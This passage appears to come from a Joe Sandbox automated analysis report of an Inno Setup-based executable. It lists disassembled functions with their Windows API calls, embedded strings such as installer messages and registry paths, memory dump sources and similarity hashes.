                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringWrite
                                                                                • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                • API String ID: 390214022-3304407042
                                                                                • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                APIs
                                                                                • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ClassInfoLongMessageSendWindow
                                                                                • String ID: COMBOBOX$Inno Setup: Language
                                                                                • API String ID: 3391662889-4234151509
                                                                                • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                  • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                  • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                  • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 2359071979-2308483597
                                                                                • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                APIs
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                • String ID:
                                                                                • API String ID: 2222416421-0
                                                                                • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                  • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                • TranslateMessage.USER32(?), ref: 004573B3
                                                                                • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                • String ID: [Paused]
                                                                                • API String ID: 1007367021-4230553315
                                                                                • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                APIs
                                                                                • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LoadSleep
                                                                                • String ID: CheckPassword
                                                                                • API String ID: 4023313301-1302249611
                                                                                • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                APIs
                                                                                  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                Strings
                                                                                • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                • API String ID: 613034392-3771334282
                                                                                • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,CreateAssemblyCache), ref: 0045983F
                                                                                Strings
                                                                                • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                • CreateAssemblyCache, xrefs: 00459836
                                                                                • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                • Fusion.dll, xrefs: 004597DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                • API String ID: 190572456-3990135632
                                                                                • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                APIs
                                                                                  • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                • GetFocus.USER32 ref: 0041C168
                                                                                • GetDC.USER32(?), ref: 0041C174
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                • String ID:
                                                                                • API String ID: 3303097818-0
                                                                                • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                • 6FC92980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                  • Part of subcall function 004107F8: 6FC8C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                • 6FCFCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                • 6FCFC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                • 6FCFCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                • 6FC90860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$C400C740C90860C92980
                                                                                • String ID:
                                                                                • API String ID: 992039177-0
                                                                                • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                • API String ID: 47109696-2530820420
                                                                                • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                APIs
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$Delete$Stretch
                                                                                • String ID:
                                                                                • API String ID: 1458357782-0
                                                                                • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00495519
                                                                                  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                Strings
                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
